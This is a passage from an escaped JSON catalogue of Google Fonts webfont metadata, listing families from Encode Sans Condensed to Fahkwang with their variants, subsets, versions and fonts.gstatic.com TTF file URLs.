\"900\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v10\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"100\": \"http://fonts.gstatic.com/s/encodesanscondensed/v10/j8_76_LD37rqfuwxyIuaZhE6cRXOLtm2gfT-5a-JLQoFI2KR.ttf\",\n        \"200\": \"http://fonts.gstatic.com/s/encodesanscondensed/v10/j8_46_LD37rqfuwxyIuaZhE6cRXOLtm2gfT-SY6pByQJKnuIFA.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/encodesanscondensed/v10/j8_46_LD37rqfuwxyIuaZhE6cRXOLtm2gfT-LY2pByQJKnuIFA.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/encodesanscondensed/v10/j8_16_LD37rqfuwxyIuaZhE6cRXOLtm2gfTGgaWNDw8VIw.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/encodesanscondensed/v10/j8_46_LD37rqfuwxyIuaZhE6cRXOLtm2gfT-dYypByQJKnuIFA.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/encodesanscondensed/v10/j8_46_LD37rqfuwxyIuaZhE6cRXOLtm2gfT-WYupByQJKnuIFA.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/encodesanscondensed/v10/j8_46_LD37rqfuwxyIuaZhE6cRXOLtm2gfT-PYqpByQJKnuIFA.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/encodesanscondensed/v10/j8_46_LD37rqfuwxyIuaZhE6cRXOLtm2gfT-IYmpByQJKnuIFA.ttf\",\n        \"900\": \"http://fonts.gstatic.com/s/encodesanscondensed/v10/j8_46_LD37rqfuwxyIuaZhE6cRXOLtm2gfT-BYipByQJKnuIFA.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Encode Sans Expanded\",\n      \"variants\": [\n        \"100\",\n        \"200\",\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"800\",\n        \"900\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v10\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"100\": \"http://fonts.gstatic.com/s/encodesansexpanded/v10/c4mx1mF4GcnstG_Jh1QH6ac4hNLeNyeYUpJGKQNicoAbJlw.ttf\",\n        \"200\": \"http://fonts.gstatic.com/s/encodesansexpanded/v10/c4mw1mF4GcnstG_Jh1QH6ac4hNLeNyeYUpLqCCNIXIwSP0XD.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/encodesansexpanded/v10/c4mw1mF4GcnstG_Jh1QH6ac4hNLeNyeYUpKOCyNIXIwSP0XD.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/encodesansexpanded/v10/c4m_1mF4GcnstG_Jh1QH6ac4hNLeNyeYUqoiIwdAd5Ab.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/encodesansexpanded/v10/c4mw1mF4GcnstG_Jh1QH6ac4hNLeNyeYUpLWCiNIXIwSP0XD.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/encodesansexpanded/v10/c4mw1mF4GcnstG_Jh1QH6ac4hNLeNyeYUpL6DSNIXIwSP0XD.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/encodesansexpanded/v10/c4mw1mF4GcnstG_Jh1QH6ac4hNLeNyeYUpKeDCNIXIwSP0XD.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/encodesansexpanded/v10/c4mw1mF4GcnstG_Jh1QH6ac4hNLeNyeYUpKCDyNIXIwSP0XD.ttf\",\n        \"900\": \"http://fonts.gstatic.com/s/encodesansexpanded/v10/c4mw1mF4GcnstG_Jh1QH6ac4hNLeNyeYUpKmDiNIXIwSP0XD.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Encode Sans SC\",\n      \"variants\": [\n        \"100\",\n        \"200\",\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"800\",\n        \"900\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v8\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"100\": \"http://fonts.gstatic.com/s/encodesanssc/v8/jVyp7nLwCGzQ9zE7ZyRg0QRXHPZc_uUA6Kb3VJWLE_Pdtm7lcD6qvXT1HHhn8c9NOEEClIc.ttf\",\n        \"200\": \"http://fonts.gstatic.com/s/encodesanssc/v8/jVyp7nLwCGzQ9zE7ZyRg0QRXHPZc_uUA6Kb3VJWLE_Pdtm7lcD6qvXT1HPhm8c9NOEEClIc.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/encodesanssc/v8/jVyp7nLwCGzQ9zE7ZyRg0QRXHPZc_uUA6Kb3VJWLE_Pdtm7lcD6qvXT1HCZm8c9NOEEClIc.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/encodesanssc/v8/jVyp7nLwCGzQ9zE7ZyRg0QRXHPZc_uUA6Kb3VJWLE_Pdtm7lcD6qvXT1HHhm8c9NOEEClIc.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/encodesanssc/v8/jVyp7nLwCGzQ9zE7ZyRg0QRXHPZc_uUA6Kb3VJWLE_Pdtm7lcD6qvXT1HEpm8c9NOEEClIc.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/encodesanssc/v8/jVyp7nLwCGzQ9zE7ZyRg0QRXHPZc_uUA6Kb3VJWLE_Pdtm7lcD6qvXT1HKZh8c9NOEEClIc.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/encodesanssc/v8/jVyp7nLwCGzQ9zE7ZyRg0QRXHPZc_uUA6Kb3VJWLE_Pdtm7lcD6qvXT1HJ9h8c9NOEEClIc.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/encodesanssc/v8/jVyp7nLwCGzQ9zE7ZyRg0QRXHPZc_uUA6Kb3VJWLE_Pdtm7lcD6qvXT1HPhh8c9NOEEClIc.ttf\",\n        \"900\": \"http://fonts.gstatic.com/s/encodesanssc/v8/jVyp7nLwCGzQ9zE7ZyRg0QRXHPZc_uUA6Kb3VJWLE_Pdtm7lcD6qvXT1HNFh8c9NOEEClIc.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Encode Sans Semi Condensed\",\n      \"variants\": [\n        \"100\",\n        \"200\",\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"800\",\n        \"900\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v10\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"100\": \"http://fonts.gstatic.com/s/encodesanssemicondensed/v10/3qT6oiKqnDuUtQUEHMoXcmspmy55SFWrXFRp9FTOG1T19MFtQ9jpVUA.ttf\",\n        \"200\": \"http://fonts.gstatic.com/s/encodesanssemicondensed/v10/3qT7oiKqnDuUtQUEHMoXcmspmy55SFWrXFRp9FTOG1RZ1eFHbdTgTFmr.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/encodesanssemicondensed/v10/3qT7oiKqnDuUtQUEHMoXcmspmy55SFWrXFRp9FTOG1Q91uFHbdTgTFmr.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/encodesanssemicondensed/v10/3qT4oiKqnDuUtQUEHMoXcmspmy55SFWrXFRp9FTOG2yR_sVPRsjp.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/encodesanssemicondensed/v10/3qT7oiKqnDuUtQUEHMoXcmspmy55SFWrXFRp9FTOG1Rl1-FHbdTgTFmr.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/encodesanssemicondensed/v10/3qT7oiKqnDuUtQUEHMoXcmspmy55SFWrXFRp9FTOG1RJ0OFHbdTgTFmr.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/encodesanssemicondensed/v10/3qT7oiKqnDuUtQUEHMoXcmspmy55SFWrXFRp9FTOG1Qt0eFHbdTgTFmr.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/encodesanssemicondensed/v10/3qT7oiKqnDuUtQUEHMoXcmspmy55SFWrXFRp9FTOG1Qx0uFHbdTgTFmr.ttf\",\n        \"900\": \"http://fonts.gstatic.com/s/encodesanssemicondensed/v10/3qT7oiKqnDuUtQUEHMoXcmspmy55SFWrXFRp9FTOG1QV0-FHbdTgTFmr.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Encode Sans Semi Expanded\",\n      \"variants\": [\n        \"100\",\n        \"200\",\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"800\",\n        \"900\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v18\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"100\": \"http://fonts.gstatic.com/s/encodesanssemiexpanded/v18/ke8xOhAPMEZs-BDuzwftTNJ85JvwMOzE9d9Cca5TM-41KwrlKXeOEA.ttf\",\n        \"200\": \"http://fonts.gstatic.com/s/encodesanssemiexpanded/v18/ke8yOhAPMEZs-BDuzwftTNJ85JvwMOzE9d9Cca5TM0IUCyDLJX6XCWU.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/encodesanssemiexpanded/v18/ke8yOhAPMEZs-BDuzwftTNJ85JvwMOzE9d9Cca5TMyYXCyDLJX6XCWU.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/encodesanssemiexpanded/v18/ke83OhAPMEZs-BDuzwftTNJ85JvwMOzE9d9Cca5TC4o_LyjgOXc.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/encodesanssemiexpanded/v18/ke8yOhAPMEZs-BDuzwftTNJ85JvwMOzE9d9Cca5TM34WCyDLJX6XCWU.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/encodesanssemiexpanded/v18/ke8yOhAPMEZs-BDuzwftTNJ85JvwMOzE9d9Cca5TM1IRCyDLJX6XCWU.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/encodesanssemiexpanded/v18/ke8yOhAPMEZs-BDuzwftTNJ85JvwMOzE9d9Cca5TMzYQCyDLJX6XCWU.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/encodesanssemiexpanded/v18/ke8yOhAPMEZs-BDuzwftTNJ85JvwMOzE9d9Cca5TMyoTCyDLJX6XCWU.ttf\",\n        \"900\": \"http://fonts.gstatic.com/s/encodesanssemiexpanded/v18/ke8yOhAPMEZs-BDuzwftTNJ85JvwMOzE9d9Cca5TMw4SCyDLJX6XCWU.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Engagement\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v22\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/engagement/v22/x3dlckLDZbqa7RUs9MFVXNossybsHQI.ttf\"\n      },\n      \"category\": \"handwriting\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Englebert\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v17\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/englebert/v17/xn7iYH8w2XGrC8AR4HSxT_fYdN-WZw.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Enriqueta\",\n      \"variants\": [\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v15\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/enriqueta/v15/goksH6L7AUFrRvV44HVTS0CjkP1Yog.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/enriqueta/v15/gokpH6L7AUFrRvV44HVrv2mHmNZEq6TTFw.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/enriqueta/v15/gokpH6L7AUFrRvV44HVrk26HmNZEq6TTFw.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/enriqueta/v15/gokpH6L7AUFrRvV44HVr92-HmNZEq6TTFw.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Ephesis\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v7\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/ephesis/v7/uU9PCBUS8IerL2VG7xPb3vyHmlI.ttf\"\n      },\n      \"category\": \"handwriting\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Epilogue\",\n      \"variants\": [\n        \"100\",\n        \"200\",\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"800\",\n        \"900\",\n        \"100italic\",\n        \"200italic\",\n        \"300italic\",\n        \"italic\",\n        \"500italic\",\n        \"600italic\",\n        \"700italic\",\n        \"800italic\",\n        \"900italic\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v13\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"100\": \"http://fonts.gstatic.com/s/epilogue/v13/O4ZMFGj5hxF0EhjimngomvnCCtqb30OXMDLiDJXVigHPVA.ttf\",\n        \"200\": \"http://fonts.gstatic.com/s/epilogue/v13/O4ZMFGj5hxF0EhjimngomvnCCtqb30OXsDPiDJXVigHPVA.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/epilogue/v13/O4ZMFGj5hxF0EhjimngomvnCCtqb30OXbjPiDJXVigHPVA.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/epilogue/v13/O4ZMFGj5hxF0EhjimngomvnCCtqb30OXMDPiDJXVigHPVA.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/epilogue/v13/O4ZMFGj5hxF0EhjimngomvnCCtqb30OXAjPiDJXVigHPVA.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/epilogue/v13/O4ZMFGj5hxF0EhjimngomvnCCtqb30OX7jTiDJXVigHPVA.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/epilogue/v13/O4ZMFGj5hxF0EhjimngomvnCCtqb30OX1zTiDJXVigHPVA.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/epilogue/v13/O4ZMFGj5hxF0EhjimngomvnCCtqb30OXsDTiDJXVigHPVA.ttf\",\n        \"900\": \"http://fonts.gstatic.com/s/epilogue/v13/O4ZMFGj5hxF0EhjimngomvnCCtqb30OXmTTiDJXVigHPVA.ttf\",\n        \"100italic\": \"http://fonts.gstatic.com/s/epilogue/v13/O4ZCFGj5hxF0EhjimlIhqAYaY7EBcUSC-HAKTp_RqATfVHNU.ttf\",\n        \"200italic\": \"http://fonts.gstatic.com/s/epilogue/v13/O4ZCFGj5hxF0EhjimlIhqAYaY7EBcUSC-HCKT5_RqATfVHNU.ttf\",\n        \"300italic\": \"http://fonts.gstatic.com/s/epilogue/v13/O4ZCFGj5hxF0EhjimlIhqAYaY7EBcUSC-HBUT5_RqATfVHNU.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/epilogue/v13/O4ZCFGj5hxF0EhjimlIhqAYaY7EBcUSC-HAKT5_RqATfVHNU.ttf\",\n        \"500italic\": \"http://fonts.gstatic.com/s/epilogue/v13/O4ZCFGj5hxF0EhjimlIhqAYaY7EBcUSC-HA4T5_RqATfVHNU.ttf\",\n        \"600italic\": \"http://fonts.gstatic.com/s/epilogue/v13/O4ZCFGj5hxF0EhjimlIhqAYaY7EBcUSC-HDUSJ_RqATfVHNU.ttf\",\n        \"700italic\": \"http://fonts.gstatic.com/s/epilogue/v13/O4ZCFGj5hxF0EhjimlIhqAYaY7EBcUSC-HDtSJ_RqATfVHNU.ttf\",\n        \"800italic\": \"http://fonts.gstatic.com/s/epilogue/v13/O4ZCFGj5hxF0EhjimlIhqAYaY7EBcUSC-HCKSJ_RqATfVHNU.ttf\",\n        \"900italic\": \"http://fonts.gstatic.com/s/epilogue/v13/O4ZCFGj5hxF0EhjimlIhqAYaY7EBcUSC-HCjSJ_RqATfVHNU.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Erica One\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v23\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/ericaone/v23/WBLnrEXccV9VGrOKmGD1W0_MJMGxiQ.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Esteban\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v14\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/esteban/v14/r05bGLZE-bdGdN-GdOuD5jokU8E.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Estonia\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v9\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/estonia/v9/7Au_p_4ijSecA1yHCCL8zkwMIFg.ttf\"\n      },\n      \"category\": \"handwriting\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Euphoria Script\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v16\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/euphoriascript/v16/mFTpWb0X2bLb_cx6To2B8GpKoD5ak_ZT1D8x7Q.ttf\"\n      },\n      \"category\": \"handwriting\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Ewert\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v21\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/ewert/v21/va9I4kzO2tFODYBvS-J3kbDP.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Exo\",\n      \"variants\": [\n        \"100\",\n        \"200\",\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"800\",\n        \"900\",\n        \"100italic\",\n        \"200italic\",\n        \"300italic\",\n        \"italic\",\n        \"500italic\",\n        \"600italic\",\n        \"700italic\",\n        \"800italic\",\n        \"900italic\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v20\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"100\": \"http://fonts.gstatic.com/s/exo/v20/4UaZrEtFpBI4f1ZSIK9d4LjJ4lM2CwNsOl4p5Is.ttf\",\n        \"200\": \"http://fonts.gstatic.com/s/exo/v20/4UaZrEtFpBI4f1ZSIK9d4LjJ4tM3CwNsOl4p5Is.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/exo/v20/4UaZrEtFpBI4f1ZSIK9d4LjJ4g03CwNsOl4p5Is.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/exo/v20/4UaZrEtFpBI4f1ZSIK9d4LjJ4lM3CwNsOl4p5Is.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/exo/v20/4UaZrEtFpBI4f1ZSIK9d4LjJ4mE3CwNsOl4p5Is.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/exo/v20/4UaZrEtFpBI4f1ZSIK9d4LjJ4o0wCwNsOl4p5Is.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/exo/v20/4UaZrEtFpBI4f1ZSIK9d4LjJ4rQwCwNsOl4p5Is.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/exo/v20/4UaZrEtFpBI4f1ZSIK9d4LjJ4tMwCwNsOl4p5Is.ttf\",\n        \"900\": \"http://fonts.gstatic.com/s/exo/v20/4UaZrEtFpBI4f1ZSIK9d4LjJ4vowCwNsOl4p5Is.ttf\",\n        \"100italic\": \"http://fonts.gstatic.com/s/exo/v20/4UafrEtFpBISdmSt-MY2ehbO95t040FmPnws9Iu-uA.ttf\",\n        \"200italic\": \"http://fonts.gstatic.com/s/exo/v20/4UafrEtFpBISdmSt-MY2ehbO95t0Y0BmPnws9Iu-uA.ttf\",\n        \"300italic\": \"http://fonts.gstatic.com/s/exo/v20/4UafrEtFpBISdmSt-MY2ehbO95t0vUBmPnws9Iu-uA.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/exo/v20/4UafrEtFpBISdmSt-MY2ehbO95t040BmPnws9Iu-uA.ttf\",\n        \"500italic\": \"http://fonts.gstatic.com/s/exo/v20/4UafrEtFpBISdmSt-MY2ehbO95t00UBmPnws9Iu-uA.ttf\",\n        \"600italic\": \"http://fonts.gstatic.com/s/exo/v20/4UafrEtFpBISdmSt-MY2ehbO95t0PUdmPnws9Iu-uA.ttf\",\n        \"700italic\": \"http://fonts.gstatic.com/s/exo/v20/4UafrEtFpBISdmSt-MY2ehbO95t0BEdmPnws9Iu-uA.ttf\",\n        \"800italic\": \"http://fonts.gstatic.com/s/exo/v20/4UafrEtFpBISdmSt-MY2ehbO95t0Y0dmPnws9Iu-uA.ttf\",\n        \"900italic\": \"http://fonts.gstatic.com/s/exo/v20/4UafrEtFpBISdmSt-MY2ehbO95t0SkdmPnws9Iu-uA.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Exo 2\",\n      \"variants\": [\n        \"100\",\n        \"200\",\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"800\",\n        \"900\",\n        \"100italic\",\n        \"200italic\",\n        \"300italic\",\n        \"italic\",\n        \"500italic\",\n        \"600italic\",\n        \"700italic\",\n        \"800italic\",\n        \"900italic\"\n      ],\n      \"subsets\": [\n        \"cyrillic\",\n        \"cyrillic-ext\",\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v20\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"100\": \"http://fonts.gstatic.com/s/exo2/v20/7cH1v4okm5zmbvwkAx_sfcEuiD8jvvOcPtq-rpvLpQ.ttf\",\n        \"200\": \"http://fonts.gstatic.com/s/exo2/v20/7cH1v4okm5zmbvwkAx_sfcEuiD8jPvKcPtq-rpvLpQ.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/exo2/v20/7cH1v4okm5zmbvwkAx_sfcEuiD8j4PKcPtq-rpvLpQ.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/exo2/v20/7cH1v4okm5zmbvwkAx_sfcEuiD8jvvKcPtq-rpvLpQ.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/exo2/v20/7cH1v4okm5zmbvwkAx_sfcEuiD8jjPKcPtq-rpvLpQ.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/exo2/v20/7cH1v4okm5zmbvwkAx_sfcEuiD8jYPWcPtq-rpvLpQ.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/exo2/v20/7cH1v4okm5zmbvwkAx_sfcEuiD8jWfWcPtq-rpvLpQ.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/exo2/v20/7cH1v4okm5zmbvwkAx_sfcEuiD8jPvWcPtq-rpvLpQ.ttf\",\n        \"900\": \"http://fonts.gstatic.com/s/exo2/v20/7cH1v4okm5zmbvwkAx_sfcEuiD8jF_WcPtq-rpvLpQ.ttf\",\n        \"100italic\": \"http://fonts.gstatic.com/s/exo2/v20/7cH3v4okm5zmbtYtMeA0FKq0Jjg2drF0fNC6jJ7bpQBL.ttf\",\n        \"200italic\": \"http://fonts.gstatic.com/s/exo2/v20/7cH3v4okm5zmbtYtMeA0FKq0Jjg2drH0fdC6jJ7bpQBL.ttf\",\n        \"300italic\": \"http://fonts.gstatic.com/s/exo2/v20/7cH3v4okm5zmbtYtMeA0FKq0Jjg2drEqfdC6jJ7bpQBL.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/exo2/v20/7cH3v4okm5zmbtYtMeA0FKq0Jjg2drF0fdC6jJ7bpQBL.ttf\",\n        \"500italic\": \"http://fonts.gstatic.com/s/exo2/v20/7cH3v4okm5zmbtYtMeA0FKq0Jjg2drFGfdC6jJ7bpQBL.ttf\",\n        \"600italic\": \"http://fonts.gstatic.com/s/exo2/v20/7cH3v4okm5zmbtYtMeA0FKq0Jjg2drGqetC6jJ7bpQBL.ttf\",\n        \"700italic\": \"http://fonts.gstatic.com/s/exo2/v20/7cH3v4okm5zmbtYtMeA0FKq0Jjg2drGTetC6jJ7bpQBL.ttf\",\n        \"800italic\": \"http://fonts.gstatic.com/s/exo2/v20/7cH3v4okm5zmbtYtMeA0FKq0Jjg2drH0etC6jJ7bpQBL.ttf\",\n        \"900italic\": \"http://fonts.gstatic.com/s/exo2/v20/7cH3v4okm5zmbtYtMeA0FKq0Jjg2drHdetC6jJ7bpQBL.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Expletus Sans\",\n      \"variants\": [\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"italic\",\n        \"500italic\",\n        \"600italic\",\n        \"700italic\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v24\",\n      \"lastModified\": \"2023-01-06\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/expletussans/v24/RLpqK5v5_bqufTYdnhFzDj2dX_IwS3my73zcDaSY2s1oFQTcXfMm.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/expletussans/v24/RLpqK5v5_bqufTYdnhFzDj2dX_IwS3my73zcDaSq2s1oFQTcXfMm.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/expletussans/v24/RLpqK5v5_bqufTYdnhFzDj2dX_IwS3my73zcDaRG3c1oFQTcXfMm.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/expletussans/v24/RLpqK5v5_bqufTYdnhFzDj2dX_IwS3my73zcDaR_3c1oFQTcXfMm.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/expletussans/v24/RLpoK5v5_bqufTYdnhFzDj2ddfsCtKHbhOZyCrFQmSUrHwD-WOMmKKY.ttf\",\n        \"500italic\": \"http://fonts.gstatic.com/s/expletussans/v24/RLpoK5v5_bqufTYdnhFzDj2ddfsCtKHbhOZyCrFQmRcrHwD-WOMmKKY.ttf\",\n        \"600italic\": \"http://fonts.gstatic.com/s/expletussans/v24/RLpoK5v5_bqufTYdnhFzDj2ddfsCtKHbhOZyCrFQmfssHwD-WOMmKKY.ttf\",\n        \"700italic\": \"http://fonts.gstatic.com/s/expletussans/v24/RLpoK5v5_bqufTYdnhFzDj2ddfsCtKHbhOZyCrFQmcIsHwD-WOMmKKY.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Explora\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"cherokee\",\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v7\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/explora/v7/tsstApxFfjUH4wrvc1qPonC3vqc.ttf\"\n      },\n      \"category\": \"handwriting\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Fahkwang\",\n      \"variants\": [\n        \"200\",\n        \"200italic\",\n        \"300\",\n        \"300italic\",\n        \"regular\",\n        \"italic\",\n        \"500\",\n        \"500italic\",\n        \"600\",\n        \"600italic\",\n        \"700\",\n        \"700italic\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"thai\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v16\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"200\": \"http://fonts.gstatic.com/s/fahkwang/v16/Noa26Uj3zpmBOgbNpOJHmZlRFipxkwjx.ttf\",\n        \"200italic\": 